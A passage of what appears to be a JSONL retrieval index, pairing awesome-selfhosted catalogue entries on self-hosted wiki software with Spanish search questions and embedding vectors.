notebooks, databases, and wikis that is entirely self-contained, runs in your browser, and is only 58 kilobytes in size [AGPL-3.0, Javascript]. Gitit β€” Wiki program that stores pages and uploaded files in a git repository, which can then be modified using the VCS command line tools or the wiki's web interface [GPL-2.0, Haskell]. Gollum β€” Simple, Git-powered wiki with a sweet API and local frontend [MIT, Ruby]. LeafWiki β€” A fast wiki for people who think in folders, not feeds. Fast editing. Tree navigation. Markdown on disk [MIT, Docker/Go]. Mediawiki β€” Wiki software package that powers Wikipedia and all other Wikimedia projects, serving hundreds of millions of users each month [GPL-2.0, PHP]. Mycorrhiza Wiki β€” Filesystem and git-based wiki engine written in Go using Mycomarkup as its primary markup language [AGPL-3.0, Go]. Otter Wiki β€” Simple, easy to use wiki software using markdown [MIT, Docker].", "indexar": "con quΓ© herramienta puedo montar una base de datos personal que guarde todo en un repositorio git?", "v": [-0.06401, 0.02678, -0.167, -0.18361, 0.00301, -0.1169, -0.07212, 0.04328, -0.12011, -0.08494, -0.00794, -0.06768, 0.0109, 0.02762, 0.08184, 0.00013, 0.0919, -0.104, -0.03611, 0.01743, -0.06958, -0.00335, 0.08254, -0.1563, -0.0887, 0.06381, 0.20545, 0.03783, -0.17927, 0.18017, 0.0117, 0.00235, -0.07803, -0.01886, -0.1804, -0.03313, 0.0382, 0.04804, -0.04461, -0.01038, -0.0877, -0.05675, -0.06407, 0.15021, 0.05316, -0.04266, 0.03773, -0.02804, 0.07244, 0.0172, -0.03073, -0.08183, -0.06202, -0.04161, -0.01991, -0.11341, 0.20576, -0.10032, 0.09077, 0.00936, -0.17053, 0.09329, 0.05313, 0.02892, 0.00423, -0.00266, 0.01093, -0.04637, -0.1583, 0.05766, -0.08409, -0.01133, -0.04514, 0.01067, -0.03766, -0.03148, 0.06517, 0.01453, -0.05601, 0.05361, -0.10735, 0.01387, -0.03667, 0.0719, -0.09333, -0.05126, 0.07143, -0.02448, 0.01664, -0.01892, 0.05406, 0.09714, -0.10863, 0.01192, 0.02278, -0.03358, 0.0899, -0.0178, -0.06659, -0.10176, 0.03708, -0.00332, 0.01319, 0.11078, 0.08932, 0.00304, 0.05699, 0.0126, -0.05903, -0.04244, 0.06169, 0.04669, -0.04961, 0.06614, -0.00913, -0.04079, -0.06671, -0.03217, 0.00886, -0.01684, 0.07662, 0.00284, -0.02676, -0.05789, 0.03933, -0.0022, 0.00563, 0.0983, -0.07042, -0.04076, -0.02785, -0.06515, -0.08597, 0.0099, -0.00599, 0.05839, -0.05468, -0.14329, 0.02288, -0.02746, 0.01004, -0.01043, -0.02047, -0.02608, 0.06309, -0.0146, 0.02883, 0.02515, -0.05517, -0.03345, 0.03883, 0.04462, 0.04878, 0.04876, -0.12637, 0.00157, 0.04468, -0.03384, -0.02828, 0.02536, 0.03455, 0.03048, -0.05452, 0.07954, 0.0135, -0.04214, 0.10476, 0.05877, 0.02988, 0.06354, 0.0033, 0.07122, 0.05852, -0.09532, 0.02387, -0.07172, -0.09503, -0.08011, -0.01712, -0.03073, 0.02996, -0.04607, 0.01198, -0.00682, 0.05028, -0.03884, 0.05085, -0.02344, 0.0014, 0.03147, -0.04854, 0.05314, 0.03602, -0.05085, 0.08074, -0.03143, -0.01036, -0.00145, 0.05191, 0.02105, -0.03208, 0.0262, 0.00298, 0.02429, 0.00528, 0.00735, -0.0616, -0.03037, 0.01613, -0.05899, 0.02751, 0.0439, 0.02132, -0.01642, -0.01641, -0.01007, 0.0089, 0.03385, -0.01427, -0.0349, -0.01269, 0.05069, 0.08512, -0.00273, -0.03751, 0.01814, -0.00037, -0.02546, 0.01221, 0.01948, 0.0198, -0.05401, 0.01273, -0.03082, 0.04268, -0.02895, -0.03242, 0.03639, -0.01881, -0.02861, -0.0091, 0.07164, -0.00377, -0.07345, -0.03125, -0.05179, -0.03112, 0.01854, -0.01683, -0.07752, -0.04492, -0.05245, 0.0124, -0.06147, -0.06264, -0.02191]} -{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: Feather Wiki β€” A lightning fast and infinitely extensible tool for creating personal non-linear notebooks, databases, and wikis that is entirely self-contained, runs in your browser, and is only 58 kilobytes in size [AGPL-3.0, Javascript]. Gitit β€” Wiki program that stores pages and uploaded files in a git repository, which can then be modified using the VCS command line tools or the wiki's web interface [GPL-2.0, Haskell]. Gollum β€” Simple, Git-powered wiki with a sweet API and local frontend [MIT, Ruby]. LeafWiki β€” A fast wiki for people who think in folders, not feeds. Fast editing. Tree navigation. Markdown on disk [MIT, Docker/Go]. Mediawiki β€” Wiki software package that powers Wikipedia and all other Wikimedia projects, serving hundreds of millions of users each month [GPL-2.0, PHP]. Mycorrhiza Wiki β€” Filesystem and git-based wiki engine written in Go using Mycomarkup as its primary markup language [AGPL-3.0, Go]. Otter Wiki β€” Simple, easy to use wiki software using markdown [MIT, Docker].", "indexar": "cual es una alternativa libre a mediawiki para mantener mis apuntes en formato carpetas?", "v": [0.13817, 0.0983, -0.01663, -0.03129, -0.08057, -0.08946, -0.12473, 0.03534, -0.12998, -0.1343, -0.02858, -0.17665, -0.05448, 0.01456, 0.08922, 0.05057, 0.17179, -0.0441, 0.15708, -0.0669, 0.05297, -0.0718, -0.07682, -0.09149, -0.09472, -0.04514, 0.1672, 0.05741, -0.11774, 0.02464, 0.01667, 0.13435, 0.02448, 0.00971, -0.06992, 0.01824, 0.07715, 0.04842, 0.01547, -0.03039, -0.03852, -0.0057, -0.06184, 0.04093, 0.01994, -0.08283, -0.03815, -0.03842, -0.1147, 0.05907, 0.0392, -0.08013, -0.05231, 0.10211, 0.00933, -0.11179, 0.15803, -0.08671, -0.06779, 0.0466, -0.02541, 0.06331, -0.08585, -0.02075, 0.06932, 0.02437, 0.00524, -0.06294, -0.13595, 0.19841, -0.00413, -0.06933, 0.13564, -0.07434, -0.07553, 0.08414, -0.15663, -0.09419, -0.06379, -0.02891, -0.05281, -0.01689, 0.04416, 0.0445, -0.05002, -0.10921, 0.07724, -0.03322, -0.12372, -0.02417, 0.11726, -0.03448, -0.04527, 0.05932, -0.03181, -0.11779, 0.03138, 0.07455, 0.03953, 0.04594, -0.04032, 0.02997, -0.09748, -0.02794, -0.10518, -0.05478, -0.07652, -0.0198, -0.06767, 0.0065, 0.07257, 0.22911, 0.06447, 0.07289, -0.05854, -0.0048, 0.03998, 0.03523, -0.00963, 0.05864, 0.03358, -0.02656, -0.02173, -0.00417, 0.07056, 0.00591, 0.03081, -0.00271, -0.01922, 0.10291, -0.00168, 0.02209, -0.03798, -0.03601, -0.0486, -0.09333, 0.01012, -0.01586, 0.06296, -0.06869, 0.02036, -0.00644, 0.05127, 0.03963, 0.01892, -0.04381, 0.01192, -0.03316, -0.04504, -0.00375, -0.03152, -0.01679, 0.0097, 0.02262, -0.03532, 0.03012, -0.04353, -0.03032, -0.06543, 0.0221, 0.02438, -0.08112, 0.04577, 0.0096, -0.02104, -0.08705, -0.02114, -0.01752, -0.04134, 0.01642, -0.00977, 0.05236, 0.04663, -0.05169, 0.00912, -0.05538, 0.01051, -0.04471, 0.00967, 0.0058, -0.01386, 0.0239, -0.05809, 0.05654, -0.02708, -0.07157, -0.00405, 0.03148, -0.0332, 0.02366, -0.00289, 0.05479, -0.04237, -0.05813, -0.0311, -0.02083, -0.00292, -0.06493, 0.04147, 0.03281, -0.06361, -0.00659, 0.01993, -0.00717, 0.02558, -0.01833, -0.0703, 0.00754, 0.00119, 0.11272, 0.01357, 0.05073, 0.03542, -0.02877, -0.06485, 0.01332, 0.02659, 0.01325, -0.01174, -0.00542, 0.09397, 0.02838, 0.02636, -0.05621, 0.00913, 0.0473, -0.0014, 0.01144, -0.02459, -0.06183, 0.02806, 0.05105, -0.00352, 0.02951, 0.01599, 0.00086, 0.0059, 0.02036, 0.01595, -0.00121, 0.0138, 0.03344, -0.04956, -0.02702, 0.02987, -0.00041, -0.09564, 0.00989, -0.03773, -0.07229, 0.01253, -0.01878, 0.04518, -0.00772, 0.02141, -0.00917]} -{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: PmWiki β€” Wiki-based system for collaborative creation and maintenance of websites [GPL-3.0, PHP]. Raneto β€” Knowledgebase platform that uses static Markdown files [MIT, Nodejs]. TiddlyWiki β€” Reusable non-linear personal web notebook [BSD-3-Clause, Nodejs]. Tiki β€” Wiki CMS Groupware with the most built-in features [LGPL-2.1, PHP]. W β€” Lightweight, mutli-user, flat-file-database Wiki engine. Create pages quickly and edit them in your Web browser using Mardown/HTML/CSS/JS. The main difference with other wiki is that you are encouraged to customize each page style individually [AGPL-3.0, PHP]. WackoWiki β€” WackoWiki is a light and easy to install multilingual Wiki-engine [BSD-3-Clause, PHP]. Wiki-Go β€” A modern, feature-rich, databaseless flat-file wiki platform [GPL-3.0, Go/Docker]. Wiki.js β€” Modern, lightweight and powerful wiki app using Git and Markdown [AGPL-3.0, Nodejs/Docker/K8S]. WikiDocs β€” A databaseless markdown flat-file wiki engine [MIT, PHP/Docker]. WiKiss β€” Wiki, simple to use and install [GPL-2.0, PHP].", "indexar": "que programa hay para crear wikis colaborativas sin necesidad de base de datos?", "v": [0.09186, 0.01931, -0.09178, -0.13114, 0.15237, -0.20423, -0.04587, -0.06019, 0.02235, -0.08031, -0.01004, -0.22454, -0.06733, -0.08782, -0.02736, 0.00207, 0.15742, -0.18209, 0.04715, -0.03945, -0.01961, -0.03502, -0.03981, 0.01897, -0.05316, -0.0804, 0.02636, -0.12461, -0.02691, 0.10816, -0.00591, 0.05126, -0.09961, 0.01868, -0.02964, 0.05265, -0.05887, -0.02185, 0.07423, -0.08004, -0.15691, 0.00787, -0.06111, 0.1104, 0.01473, 0.0735, 0.03349, -0.07255, 0.03033, -0.01982, -0.04144, 0.01999, -0.09618, -0.04943, 0.00463, -0.14588, 0.06545, -0.1927, -0.08897, 0.08808, -0.12411, 0.1137, -0.03303, -0.08058, 0.03576, -0.03114, 0.08654, 0.0046, -0.00445, 0.22404, -0.05004, 0.005, -0.03778, -0.12574, 0.12185, -0.06841, 0.0356, -0.03975, -0.0917, -0.02342, 0.00663, 0.01325, 0.0904, 0.05096, -0.00622, 0.00883, 0.10489, 0.01513, 0.0847, -0.00745, 0.03056, 0.05755, -0.00738, -0.00235, 0.122, -0.02719, 0.08849, 0.01365, 0.02848, 0.10561, -0.08001, -0.14268, -0.04136, -0.04095, -0.01316, 0.10796, 0.0544, 0.03657, -0.09237, 0.05458, 0.11362, -0.00614, 0.02627, -0.03719, 0.01742, -0.01968, 0.02872, 0.06298, -0.00777, -0.04234, 0.04872, -0.00723, -0.08584, -0.06354, 0.00482, 0.03633, -0.04255, 0.10288, 0.01364, 0.03952, -0.03124, -0.01109, -0.04574, 0.04373, 0.01087, 0.03594, -0.02833, 0.01323, -0.04182, -0.05531, -0.04082, 0.02173, 0.00894, 0.01268, -0.02777, -0.0629, 0.0404, 0.05149, -0.05752, 0.04812, -0.00548, 0.06252, -0.04014, 0.00769, -0.13606, 0.03168, 0.03285, -0.00584, -0.03169, 0.01795, -0.01306, 0.00199, -0.05014, -0.05383, 0.04006, -0.10428, 0.02973, 0.02455, 0.05227, 0.06311, -0.03915, 0.07028, 0.03139, -0.12016, 0.01148, -0.00116, -0.04118, -0.07845, -0.04999, -0.06017, -0.02459, -0.062, 0.04147, -0.00099, 0.00699, -0.05287, 0.00197, 0.02101, 0.02929, -0.03049, -0.05377, 0.02143, 0.05256, -0.01413, 0.05642, -0.04645, 0.044, -0.01338, 0.06642, -0.06242, -0.02973, 0.03898, 0.02145, 0.02572, 0.00914, 0.03991, -0.01825, -0.03125, 0.09476, 0.02596, 0.0064, -0.05853, -0.0331, -0.01669, -0.02563, -0.02573, -0.00415, 0.03297, 0.03044, 0.04573, -0.01914, -0.03093, 0.0157, -0.00016, 0.0219, 0.00533, 0.05023, 0.02601, 0.02029, -0.02371, 0.01524, -0.09039, 0.01674, -0.06051, 0.01687, -0.00614, -0.01221, -0.03104, 0.01104, -0.0262, -0.04173, 0.01319, -0.03132, -0.05743, 0.022, -0.00486, -0.04728, -0.00763, 0.00635, -0.04548, -0.02546, -0.026, 0.00507, -0.04162, 0.05306, -0.00121]} -{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: PmWiki β€” Wiki-based system for collaborative creation and maintenance of websites [GPL-3.0, PHP]. Raneto β€” Knowledgebase platform that uses static Markdown files [MIT, Nodejs]. TiddlyWiki β€” Reusable non-linear personal web notebook [BSD-3-Clause, Nodejs]. Tiki β€” Wiki CMS Groupware with the most built-in features [LGPL-2.1, PHP]. W β€” Lightweight, mutli-user, flat-file-database Wiki engine. Create pages quickly and edit them in your Web browser using Mardown/HTML/CSS/JS. The main difference with other wiki is that you are encouraged to customize each page style individually [AGPL-3.0, PHP]. WackoWiki β€” WackoWiki is a light and easy to install multilingual Wiki-engine [BSD-3-Clause, PHP]. Wiki-Go β€” A modern, feature-rich, databaseless flat-file wiki platform [GPL-3.0, Go/Docker]. Wiki.js β€” Modern, lightweight and powerful wiki app using Git and Markdown [AGPL-3.0, Nodejs/Docker/K8S]. WikiDocs β€” A databaseless markdown flat-file wiki engine [MIT, PHP/Docker]. WiKiss β€” Wiki, simple to use and install [GPL-2.0, PHP].", "indexar": "con que puedo montar una plataforma de conocimiento personal usando archivos planos?", "v": [0.00513, 0.11818, -0.19909, -0.26485, -0.13967, -0.12205, 0.02913, -0.03964, -0.2271, -0.14237, -0.04317, -0.03027, 0.07584, 0.06742, -0.07274, 0.02924, 0.2143, -0.05687, 0.02455, -0.0165, -0.10342, -0.06179, -0.1034, -0.06233, -0.02344, -0.0606, 0.04455, -0.03368, -0.07395, 0.01652, -0.04303, 0.08553, 0.04134, 0.07008, -0.0334, 0.00675, 0.03841, 0.12489, -0.07198, -0.06934, -0.10384, -0.01919, -0.01308, 0.12349, 0.0018, 0.05272, -0.01304, -0.09401, 0.01777, 0.03979, -0.02893, 0.01564, -0.11865, 0.02222, -0.03091, -0.08643, 0.15899, -0.04532, 0.06978, 0.03997, -0.04166, 0.01626, 0.03385, 0.07806, 0.0031, 0.04948, 0.02016, 0.14915, -0.17864, 0.05406, 0.03961, -0.0378, 0.07077, -0.06675, 0.05117, 0.04847, 0.09822, 0.0191, -0.0245, -0.03677, 0.02507, -0.02443, -0.12055, 0.09046, -0.04074, -0.06198, -0.03024, -0.01272, 0.11217, -0.01444, 0.03117, 0.04561, -0.043, 0.0126, 0.013, -0.07917, 0.1196, 0.02408, -0.09078, -0.0436, -0.04485, 0.05095, -0.00724, 0.10335, 0.01237, 0.07642, 0.06956, -0.02561, -0.00022, -0.02859, 0.04263, 0.08102, -0.04043, 0.04981, -0.11705, -0.02682, -0.06047, 0.03856, -0.015, 0.03504, -0.01475, 0.03641, 0.04761, -0.0456, 0.12957, -0.01213, 0.02243, 0.12895, -0.07933, 0.0182, 0.03882, -0.04147, -0.03982, -0.02911, -0.0002, 0.01173, 0.03759, 0.03313, -0.00894, -0.06793, 0.09811, 0.01295, -0.05538, -0.03849, 0.03589, -0.03849, 0.00371, -0.11412, 0.01104, -0.03747, -0.07345, 0.06275, 0.01313, 0.03128, -0.05613, -0.04544, 0.02632, -0.06898, -0.04677, 0.06637, -0.05056, 0.06518, -0.06899, 0.08837, -0.01181, -0.01355, 0.03763, 0.03791, 0.04666, 0.04366, 0.04781, 0.08832, 0.05261, -0.09383, 0.08009, 0.03791, -0.06375, 0.01348, 0.01598, 0.03407, -0.0433, -0.02741, -0.02894, 0.04183, -0.04094, -0.02965, 0.0616, -0.01864, -0.00302, 0.04676, -0.0233, 0.01515, -0.00447, -0.00407, 0.02206, -0.04245, -0.07363, 0.07614, 0.00695, -0.01142, 0.02167, 0.04256, -0.02031, 0.00032, 0.0046, -0.02435, -0.00791, -0.00449, 0.06202, -0.01112, 0.02239, -0.02629, 0.07127, -0.10176, 0.01253, 0.02959, 0.02739, -0.01076, 0.01337, -0.01274, 0.00931, 0.10183, 0.0096, 0.02619, 0.01187, 0.05843, 0.00246, -0.02393, -0.00503, -0.01723, 0.00206, 0.01769, 0.00586, -0.02297, 0.03691, -0.01426, -0.00555, 0.0465, -0.04749, -0.02831, -0.00712, 0.06814, 0.02884, -0.01602, -0.00362, -0.04686, -0.03382, 0.02958, 0.01639, -0.04747, -0.00163, 0.0485, 0.00664, 0.0009, -0.01241, -0.01757]} -{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: PmWiki β€” Wiki-based system for collaborative creation and maintenance of websites [GPL-3.0, PHP]. Raneto β€” Knowledgebase platform that uses static Markdown files [MIT, Nodejs]. TiddlyWiki β€” Reusable non-linear personal web notebook [BSD-3-Clause, Nodejs]. Tiki β€” Wiki CMS Groupware with the most built-in features [LGPL-2.1, PHP]. W β€” Lightweight, mutli-user, flat-file-database Wiki engine. Create pages quickly and edit them in your Web browser using Mardown/HTML/CSS/JS. The main difference with other wiki is that you are encouraged to customize each page style individually [AGPL-3.0, PHP]. WackoWiki β€” WackoWiki is a light and easy to install multilingual Wiki-engine [BSD-3-Clause, PHP]. Wiki-Go β€” A modern, feature-rich, databaseless flat-file wiki platform [GPL-3.0, Go/Docker]. Wiki.js β€” Modern, lightweight and powerful wiki app using Git and Markdown [AGPL-3.0, Nodejs/Docker/K8S]. WikiDocs β€” A databaseless markdown flat-file wiki engine [MIT, PHP/Docker]. WiKiss β€” Wiki, simple to use and install [GPL-2.0, PHP].", "indexar": "cual es una alternativa libre a Tiki para gestionar sitios web grupales?", "v": [-0.05963, 0.06045, -0.12799, -0.03329, 0.0061, -0.11375, -0.06162, 0.00799, -0.00572, 0.01831, 0.03386, -0.12088, 0.00299, 0.1123, 0.1599, -0.02514, 0.08802, -0.16183, 0.14905, -0.01796, -0.06709, 0.07038, 0.01536, -0.02801, 0.00041, -0.19604, 0.0495, -0.15024, -0.04777, 0.04019, 0.0728, -0.06073, -0.01908, -0.15214, -0.03947, -0.00614, 0.13679, 0.05546, 0.06, -0.09553, -0.11901, -0.06989, -0.16244, 0.05464, 0.00189, -0.02115, -0.01766, -0.03175, 0.0904, 0.00999, 0.00133, -0.00788, -0.11399, 0.00829, 0.05181, 0.01319, 0.14401, -0.19013, -0.02162, 0.00812, -0.13221, 0.01802, -0.00928, 0.07574, 0.06756, -0.0008, 0.04292, 0.14085, -0.12109, 0.09625, 0.02936, -0.04662, 0.03219, -0.04982, 0.04096, 0.00803, 0.04757, 0.05826, -0.03496, 0.01204, 0.09595, -0.01858, -0.00381, 0.0457, -0.06034, -0.04869, -0.04722, -0.12867, -0.04879, 0.02237, 0.08712, -0.00506, -0.02395, -0.00773, -0.07079, -0.1594, 0.03006, 0.07432, -0.08237, 0.00043, 0.03914, 0.01317, -0.1348, 0.03815, 0.00624, 0.08568, -0.02858, 0.01648, -0.06417, 0.00677, -0.01015, -0.0104, 0.00018, 0.05346, 0.06333, 0.02438, 0.05371, 0.06639, 0.07418, -0.0243, -0.03913, -0.03681, -0.04108, -0.06224, 0.01091, 0.05223, 0.09514, 0.06495, -0.04988, 0.07537, 0.00841, -0.03674, -0.04351, -0.03971, -0.12017, -0.01278, 0.04559, 0.05089, 0.10025, -0.05977, -0.03212, -0.00791, -0.01247, -0.02398, 0.06188, -0.0208, 0.00421, -0.06871, 0.01917, 0.0736, -0.05163, -0.00895, -0.06533, 0.06265, 0.00169, -0.01657, -0.13571, -0.02619, -0.15768, 0.03136, 0.00743, -0.03254, 0.08491, 0.03706, -0.02526, 0.03841, -0.05256, 0.1119, -0.03756, 0.06019, 0.04133, 0.02454, 0.04357, -0.03827, 0.08271, -0.04944, -0.03572, -0.07774, 0.04706, -0.00619, 0.05857, -0.03915, -0.07606, -0.00402, -0.04347, -0.00332, -0.01594, 0.03914, -0.0116, 0.07547, -0.02471, -0.00517, -0.03538, -0.10442, 0.08699, -0.01074, 0.00262, -0.07582, 0.00105, -0.0323, -0.02557, -0.05369, 0.01201, 0.01668, -0.02686, 0.00919, -0.0001, 0.00285, 0.04544, 0.05966, 0.00819, 0.0375, 0.02784, -0.07176, -0.0596, -0.07856, 0.04221, -0.04281, -0.01027, 0.02748, 0.02385, 0.02311, 0.02007, 0.07322, 0.02992, 0.04038, 0.04791, 0.03714, -0.00952, 0.01684, 0.00088, -0.03164, 0.02999, 0.03017, 0.0362, -0.03413, 0.02426, 0.01613, -0.05839, 0.02361, 0.02831, 0.04696, -0.00936, -0.0045, -0.00184, -0.04163, -0.13476, -0.00875, -0.02667, -0.02185, -0.07024, -0.01094, -0.01321, -0.004, 0.02808, -0.00538]} -{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: XWiki β€” Second generation wiki that allows the user to extend its functionalities with a powerful extension-based architecture [LGPL-2.1, Java/Docker/deb]. Zim β€” Graphical text editor used to maintain a collection of wiki pages. Each page can contain links to other pages, simple formatting and images [GPL-2.0, Python/deb].", "indexar": "ΒΏquΓ© programa puedo usar para crear una enciclopedia colaborativa con muchas pΓ‘ginas?", "v": [0.11524, 0.11571, -0.0335, -0.00797, 0.07149, -0.14265, 0.00293, -0.0639, -0.04148, -0.17303, -0.05997, -0.0175, -0.10478, -0.06601, -0.05404, -0.01501, 0.13865, -0.0895, 0.07041, -0.01364, 0.0055, -0.03197, -0.07423, -0.05493, -0.06299, -0.11863, 0.07387, -0.08533, -0.06412, -0.01157, -0.05097, 0.07988, -0.00162, -0.04704, -0.02244, 0.02812, 0.09842, -0.03799, -0.00767, -0.01947, -0.09361, -0.04885, -0.14766, 0.04855, 0.0182, 0.16476, -0.01164, -0.09061, -0.10686, 0.05636, -0.01282, 0.05592, -0.1306, 0.01195, -0.00252, -0.1138, 0.19097, -0.17738, -0.01878, 0.07285, -0.03456, 0.08398, -0.00378, -0.00436, -0.06485, -0.14201, -0.05428, 0.00704, -0.03512, 0.09912, -0.04993, 0.03829, 0.0043, -0.03555, 0.12315, 0.07274, -0.07901, -0.02604, 0.03656, -0.04138, 0.00169, -0.04727, 0.05284, -0.09596, -0.07803, -0.01268, 0.07786, -0.00563, 0.04114, -0.10777, -0.0219, 0.00961, 0.01187, -0.02314, 0.02454, -0.09061, 0.09337, 0.03168, 0.0553, 0.01326, 0.0503, -0.12606, -0.06279, 0.03851, -0.09821, 0.02978, 0.04138, -0.03644, -0.03834, -0.03606, 0.13302, 0.01518, -0.06034, -0.08759, -0.05104, 0.03406, 0.00205, 0.00566, 0.01476, -0.08515, -0.07267, 0.00491, -0.07673, 0.0083, 0.08054, 0.05715, 0.04609, 0.12275, 0.00018, -0.02265, -0.02313, 0.03037, -0.12514, -0.04134, -0.04606, 0.0278, -0.00194, 0.0322, -0.04305, -0.0587, 0.07395, 0.05049, -0.00702, -0.07329, 0.00256, 0.00343, 0.04203, -0.04965, -0.0622, 0.0489, 0.07275, -0.00498, 0.01244, 0.08363, -0.04708, -0.01584, 0.0938, 0.00548, -0.00082, -0.00801, 0.01657, 0.07646, 0.0272, -0.02463, 0.051, -0.06845, -0.07382, -0.01599, 0.04907, 0.06856, 0.00286, 0.10878, 0.09097, -0.13547, 0.05022, -0.01171, -0.0462, -0.08335, 0.06616, -0.0551, -0.09258, 0.00708, 0.02738, -0.01097, -0.01582, -0.06768, 0.07664, -0.00139, -0.01058, 0.04602, -0.06994, 0.0882, -0.00015, -0.02163, 0.02701, -0.03849, 0.01747, -0.00673, -0.01018, -0.05313, 0.02366, 0.00979, -0.02796, -0.00473, 0.05025, 0.03356, -0.05987, 0.04529, 0.0443, 0.06701, 0.01036, -0.09298, 0.04773, 0.04986, -0.0616, -0.03359, 0.02203, 0.00231, 0.03672, -0.02632, 0.03821, 0.02901, 0.03706, -0.03487, 0.09221, -0.01212, 0.09765, 0.03007, 0.00532, 0.04188, -0.03121, -0.04741, 0.01498, -0.05709, 0.02953, -0.04266, 0.02443, 0.02383, -0.0367, -0.0576, -0.05178, 0.03687, -0.07532, -0.00961, -0.00083, -0.07314, -0.05824, -0.01594, 0.01327, -0.04018, -0.07943, 0.07116, 0.09322, -0.06263, 0.06494, 0.00422]} -{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: XWiki β€” Second generation wiki that allows the user to extend its functionalities with a powerful extension-based architecture [LGPL-2.1, Java/Docker/deb]. Zim β€” Graphical text editor used to maintain a collection of wiki pages. Each page can contain links to other pages, simple formatting and images [GPL-2.0, Python/deb].", "indexar": "ΒΏhay alguna herramienta que me permita editar texto y vincular fΓ‘cilmente pΓ‘ginas entre sΓ­?", "v": [-0.04109, 0.23965, -0.19054, -0.02463, 0.11658, -0.15311, -0.07624, -0.08649, -0.06409, -0.07856, 0.0058, -0.01822, 0.02101, -0.0584, 0.10049, 0.10862, 0.08028, -0.04128, 0.01034, -0.06339, 0.07937, -0.06727, -0.12419, -0.02336, -0.15059, -0.09523, 0.10971, -0.06463, -0.13761, -0.00845, -0.06117, 0.11691, 0.06753, -0.07343, -0.1221, 0.06632, 0.02239, 0.06901, -0.00518, 0.02491, -0.04567, 0.01341, -0.03885, 0.02308, -0.04875, 0.00108, -0.06978, 0.01198, -0.00218, 0.08323, -0.0151, -0.06301, -0.15472, 0.05042, -0.09595, -0.04118, 0.31922, -0.03729, 0.05199, -0.07247, -0.01214, 0.07933, -0.00945, -0.03121, -0.03998, 0.02618, -0.00943, -0.10777, -0.04742, 0.15611, -0.02425, 0.05492, 0.03272, 0.05919, 0.02071, 0.01433, -0.02628, -0.02278, 0.06619, 0.03662, 0.08045, -0.04341, -0.05653, 0.06588, -0.02522, 0.00016, 0.01833, 0.00769, 0.06524, -0.0142, -0.01326, -0.00921, -0.00918, -0.11221, -0.09565, -0.0816, 0.0555, -0.01251, 0.07922, 0.05478, 0.15752, -0.02684, -0.05454, -0.00786, -0.11247, -0.04475, -0.08836, -0.05712, 0.01395, 0.05562, 0.08158, 0.01807, -0.00472, -0.06586, -0.04296, 0.04707, 0.02763, -0.01127, 0.01978, -0.19385, -0.034, -0.02011, -0.04073, 0.00014, -0.01002, 0.00233, 0.01542, 0.09163, -0.05222, -0.02469, -0.0463, -0.0018, -0.0677, -0.08168, 0.04772, 0.00426, 0.05917, -0.07142, 0.0435, -0.05848, 0.00166, 0.01, -0.04898, -0.08386, -0.02787, 0.00883, -0.02004, -0.00631, -0.08181, -0.0034, -0.06042, -0.0549, -0.01758, 0.09082, 0.00381, 0.00627, 0.04039, 0.01524, -0.03753, -0.0261, -0.04274, 0.02726, 0.03116, -0.01773, -0.00508, -0.01725, -0.0574, -0.04057, 0.07632, 0.07835, -0.01129, -0.00946, 0.02954, 0.04649, 0.03675, -0.06433, -0.03567, 0.09489, -0.00927, -0.03111, -0.0084, -0.03628, -0.00093, -0.05117, -0.00259, -0.0338, 0.03379, -0.00781, -0.01761, 0.01164, -0.0054, 0.03223, -0.00027, -0.09612, 0.00649, -0.01607, -0.03659, -0.03695, 0.07251, 0.00437, -0.05822, -0.06844, 0.00699, 0.00785, 0.03841, 0.05648, -0.04424, 0.0006, -0.02509, 0.03353, 0.0458, -0.00669, 0.00892, -0.05362, -0.02076, -0.03457, 0.00971, -0.02363, 0.01375, 0.0061, 0.0839, 0.05318, 0.072, -0.00316, 0.0791, 0.00452, 0.03319, 0.02542, 0.00844, 0.01397, -0.0144, -0.07063, -0.08307, -0.00569, 8e-05, -0.04266, 0.07589, -0.02269, -0.05332, -0.02228, 0.02691, 0.02206, -0.01707, -0.03077, -0.00815, -0.03228, -0.05051, 0.00272, -0.03999, -0.0479, -0.03765, -0.02616, 0.06262, -0.06112, 0.04007, -0.09043]} -{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: XWiki β€” Second generation wiki that allows the user to extend its functionalities with a powerful extension-based architecture [LGPL-2.1, Java/Docker/deb]. Zim β€” Graphical text editor used to maintain a collection of wiki pages. Each page can contain links to other pages, simple formatting and images [GPL-2.0, Python/deb].", "indexar": "cual es una alternativa libre a wiki para mantener documentaciΓ³n personal", "v": [-0.11844, 0.15333, -0.04902, -0.0597, -0.02852, -0.11028, -0.07428, -0.09078, -0.16045, -0.0834, -0.07125, -0.22181, -0.00584, -0.01704, 0.04427, -0.08918, 0.15262, -0.16853, 0.16667, -0.01801, -0.08334, 0.06163, -0.04461, -0.039, -0.05969, -0.13665, 0.04035, -0.0539, -0.07002, -0.06343, 0.01932, 0.10911, -0.0811, 0.05155, -0.05161, 0.1239, 0.10213, 0.03749, 0.05904, -0.06286, -0.02221, 